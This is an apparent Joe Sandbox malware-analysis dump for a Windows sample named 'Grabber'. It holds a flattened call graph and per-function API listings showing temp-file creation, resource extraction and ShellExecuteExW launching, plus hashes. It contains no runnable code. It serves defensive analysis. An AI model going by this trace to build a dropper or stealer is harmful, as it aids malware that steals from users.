40a7a4 9353->9354 9355 40a786 GetProcAddress 9353->9355 9377 40e3f0 TlsGetValue 9354->9377 9356 40a796 GetLongPathNameW 9355->9356 9357 40a79d FreeLibrary 9355->9357 9356->9357 9357->9354 9359 401a0d 9359->8441 9360->8445 9361->8447 9378 40a7b9 9362->9378 9365 40a6c5 9366 40a6d4 wcsncpy wcslen 9365->9366 9367 401a6a GetTempFileNameW 9365->9367 9368 40a708 CreateDirectoryW 9366->9368 9370 40de80 GetLastError TlsGetValue SetLastError 9367->9370 9368->9367 9370->8458 9371->8460 9372->8470 9373->8472 9374->8480 9375->8482 9376->8488 9377->9359 9379 40a7c0 9378->9379 9380 401a5f 9378->9380 9381 40a7d6 DeleteFileW 9379->9381 9382 40a7c7 SetFileAttributesW 9379->9382 9380->9365 9381->9380 9382->9381 9383->8501 9385 40a961 SetCurrentDirectoryW 9384->9385 9386 4046cb 9384->9386 9385->9386 9386->8509 9387->8590 9388->8625 9389->8533 9390->8544 9391->8534 9392->8543 9393->8552 9395 40e260 3 API calls 9394->9395 9396 40a84f 9395->9396 9397 40a85e LoadLibraryW 9396->9397 9403 40a8e9 9396->9403 9398 40a8cb 9397->9398 9399 40a86f GetProcAddress 9397->9399 9454 40a96c SHGetFolderLocation 9398->9454 9400 40a8c0 FreeLibrary 9399->9400 9407 40a884 9399->9407 9400->9398 9408 40a91b 9400->9408 9404 40a96c 4 API calls 9403->9404 9403->9408 9404->9408 9405 40362c 9405->8580 9407->9400 9409 40a896 wcscpy wcscat wcslen CoTaskMemFree 9407->9409 9460 40e3f0 TlsGetValue 9408->9460 9409->9400 9410->8547 9411->8565 9412->8554 9413->8570 9414->8566 9415->8586 9416->8571 9417->8591 9418->8577 9419->8598 9420->8592 9421->8611 9422->8599 9423->8616 9424->8612 9425->8621 9427 409368 CoInitialize 9426->9427 9428 409379 memset LoadLibraryW 9426->9428 9427->9428 9429 4093a3 GetProcAddress GetProcAddress 9428->9429 9430 4094ab 9428->9430 9431 4093d2 wcsncpy wcslen 9429->9431 9432 4093cd 9429->9432 9433 40e260 3 API calls 9430->9433 9434 409401 9431->9434 9432->9431 9435 4094b8 9433->9435 9436 4094d1 3 API calls 9434->9436 9461 40e3f0 TlsGetValue 9435->9461 9437 40941f 9436->9437 9439 409588 16 API calls 
9437->9439 9441 409442 9439->9441 9440 4037c6 9440->8636 9442 409588 16 API calls 9441->9442 9443 409457 9442->9443 9444 40949f FreeLibrary 9443->9444 9445 40e260 3 API calls 9443->9445 9444->9430 9444->9435 9446 409468 CoTaskMemFree wcslen 9445->9446 9446->9444 9448 409493 9446->9448 9448->9444 9450 40553b timeBeginPeriod 9449->9450 9451 40554d Sleep 9449->9451 9450->9451 9452->8613 9453->8622 9455 40a98b SHGetPathFromIDListW 9454->9455 9456 40a8d3 wcscat wcslen 9454->9456 9457 40a9b5 CoTaskMemFree 9455->9457 9458 40a999 wcslen 9455->9458 9456->9408 9457->9456 9458->9457 9459 40a9a6 9458->9459 9459->9457 9460->9405 9461->9440 9462->8658 9463->8660 9464->8666 9465->8668 9466->8672 9467->8691 9468->8693 9469->8715 9470->8723 9471->8702 9473 4024f7 9472->9473 9473->9473 9474 40dfc0 21 API calls 9473->9474 9475 402509 9474->9475 9476 4051a0 3 API calls 9475->9476 9495 402512 9476->9495 9477 402593 9538 40de80 GetLastError TlsGetValue SetLastError 9477->9538 9479 402599 9539 40de80 GetLastError TlsGetValue SetLastError 9479->9539 9481 4025a1 GetCommandLineW 9483 409bc0 4 API calls 9481->9483 9482 405dc0 3 API calls 9482->9495 9484 4025ae 9483->9484 9486 40dec0 3 API calls 9484->9486 9485 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9485->9495 9487 4025b8 9486->9487 9540 40de80 GetLastError TlsGetValue SetLastError 9487->9540 9488 40de80 GetLastError TlsGetValue SetLastError 9488->9495 9490 4025c2 9491 40e020 4 API calls 9490->9491 9492 4025ca 9491->9492 9493 40dec0 3 API calls 9492->9493 9496 4025d4 PathRemoveArgsW 9493->9496 9494 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9494->9495 9495->9477 9495->9482 9495->9485 9495->9488 9495->9494 9497 4025eb 9496->9497 9498 402651 9497->9498 9541 40de80 GetLastError TlsGetValue SetLastError 9497->9541 9500 4098c0 SetEnvironmentVariableW 9498->9500 9502 40265e 9500->9502 9501 4025fd 9503 40e020 4 API calls 9501->9503 9554 40de80 GetLastError TlsGetValue SetLastError 9502->9554 9505 40260a 9503->9505 9542 40de80 
GetLastError TlsGetValue SetLastError 9505->9542 9506 402668 9508 40e020 4 API calls 9506->9508 9510 402670 9508->9510 9509 402610 9543 40de80 GetLastError TlsGetValue SetLastError 9509->9543 9555 405170 TlsGetValue 9510->9555 9513 402677 9516 40df50 HeapFree 9513->9516 9514 402618 9544 40de80 GetLastError TlsGetValue SetLastError 9514->9544 9518 40268f 9516->9518 9517 402620 9545 40de80 GetLastError TlsGetValue SetLastError 9517->9545 9521 40df50 HeapFree 9518->9521 9520 402628 9546 406110 9520->9546 9523 402698 9521->9523 9525 40df50 HeapFree 9523->9525 9524 402639 9553 405182 TlsGetValue 9524->9553 9527 4026a1 9525->9527 9529 40df50 HeapFree 9527->9529 9528 40263e 9530 406060 5 API calls 9528->9530 9531 4026aa 9529->9531 9532 402646 9530->9532 9533 40df50 HeapFree 9531->9533 9534 40dec0 3 API calls 9532->9534 9535 401ea4 9533->9535 9534->9498 9535->8708 9536->8714 9537->8703 9538->9479 9539->9481 9540->9490 9541->9501 9542->9509 9543->9514 9544->9517 9545->9520 9547 406146 9546->9547 9549 406118 9546->9549 9565 40e340 TlsGetValue 9547->9565 9549->9549 9556 406080 9549->9556 9550 40614f 9550->9524 9553->9528 9554->9506 9555->9513 9557 40e1e0 TlsGetValue 9556->9557 9558 40609c 9557->9558 9559 40e260 3 API calls 9558->9559 9560 4060a8 9559->9560 9561 4060b4 9560->9561 9566 40e370 TlsGetValue 9560->9566 9567 40e3f0 TlsGetValue 9561->9567 9564 4060fd 9564->9524 9565->9550 9566->9561 9567->9564 9568->8736 9569->8738 9570->8741 9571->8743 9572->8749 9573->8757 9574->8759 9575->8761 9576->8763 9577->8767 9578->8773 9579->8775 9580->8777 9581->8779 9582->8783 9583->8789 9584->8791 9585->8793 9586->8795 9587->8799 9588->8805 9589->8807 9590->8809 9591->8811 9592->8815 9593->8821 9595 40dfc0 21 API calls 9594->9595 9596 403ce3 9595->9596 9597 4051a0 3 API calls 9596->9597 9598 403cec 9597->9598 9599 405060 2 API calls 9598->9599 9600 403cf8 FindResourceW 9599->9600 9601 403db3 9600->9601 9602 403d1b 9600->9602 9724 40de80 GetLastError TlsGetValue SetLastError 9601->9724 

Control-flow Graph

APIs
  • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
• GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
• GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
• GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AD4
• PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401ADF
• PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B1E
• GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B38
  • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
  • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
  • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
  • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
  • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
  • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
  • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
Strings
Memory Dump Source
• Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
Similarity
• API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
• String ID: $pA$$pA$$pA$$pA
• API String ID: 368575804-1531182785
• Opcode ID: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
• Instruction ID: 28b0c429ac0839269b991b7b7970ea1d3eb295239ca2258b2b80e935eceb64c8
• Opcode Fuzzy Hash: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
• Instruction Fuzzy Hash: CD510AB1514600AED600BBB1EC4297F7B7EEB98319F01883FF544690A2CA3D985D9A6D

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040100F
• GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
• HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
  • Part of subcall function 0040DE30: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
  • Part of subcall function 0040DE30: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
  • Part of subcall function 00409B40: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
  • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(004186D0,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
  • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
  • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
  • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
  • Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004186A8,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0
• GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
  • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
  • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
  • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
  • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A418
  • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A431
  • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A43B
  • Part of subcall function 0040A348: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A35B
  • Part of subcall function 0040A348: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A370
  • Part of subcall function 0040DBCA: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
  • Part of subcall function 0040DBCA: memset.MSVCRT ref: 0040DC35
  • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
  • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
  • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
  • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
  • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
  • Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
  • Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
  • Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
• ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011A5
• HeapDestroy.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011B5
• ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011BA
Strings
Memory Dump Source
• Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
Similarity
• API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorExitHandleLastLibraryProcessSectionValue$CommonControlsDestroyEnumInitLoadModuleResourceTypes
• String ID: .pA$:pA
• API String ID: 3272620648-1142403416
• Opcode ID: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
• Instruction ID: 59fd392a0a4490bdbbe753bcbaae00d60dcbf108960a32b110b84fea6de29b28
• Opcode Fuzzy Hash: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
• Instruction Fuzzy Hash: 6C313070A80704A9D210B7F29D43F9E3A25AB1874DF51843FB644790E3CEBC55489A6F

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02199F70,00000000,00000000), ref: 004042FB
                                                                                                                                                                                                                          • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
                                                                                                                                                                                                                            • Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32(02199F70,02199F70,00002710), ref: 00402C34
                                                                                                                                                                                                                            • Part of subcall function 0040E080: TlsGetValue.KERNEL32(0000000D,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E08A
                                                                                                                                                                                                                            • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                                                                            • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(02199F70,02199F70,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                                                                                                                                                                                                            • Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,02199F70,02198968,00000000,00000000), ref: 00401E8A
                                                                                                                                                                                                                          • PathQuoteSpacesW.SHLWAPI(00000000,00000001,021989E8,00000000,00000000,00000000,00000000,00000000,02199F70,02198968,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
                                                                                                                                                                                                                          • PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,0041702A,00000000,00000000,00000000,00000001,021989E8,00000000,00000000,00000000,00000000,00000000,02199F70,02198968), ref: 004044E1
                                                                                                                                                                                                                            • Part of subcall function 00405492: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02199F70), ref: 004054AB
                                                                                                                                                                                                                            • Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                                                                                                                                                                                                            • Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                                                                                                                                                                                                            • Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                                                                                                                                                                                                            • Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
                                                                                                                                                                                                                          • String ID: *pA$*pA$pA

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                                                                                                                                                                                                            • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02190000,00000000,?,?), ref: 0040E2C7
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A76D
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A77A
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A78C
                                                                                                                                                                                                                          • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A799
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A79E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                                                                                                                                                                                          • String ID: GetLongPathNameW$Kernel32.DLL

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB31
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB72
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040ABBC
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040ABDE
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040AC17
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC6A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Create$AllocHeapPointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4207849991-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00418624,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76EC5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D85A
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D891
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00418624,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8EA
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76EC5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D8FB
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D937
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1272335518-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 004020A7
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 004020C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CodeExecuteExitProcessShell
                                                                                                                                                                                                                          • String ID: open
                                                                                                                                                                                                                          • API String ID: 1016612177-2758837156

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                                                                                                                                                                                                            • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                                                                                                                                                                                                                            • Part of subcall function 00409698: memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                                                                                                                                                                                                            • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                                                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
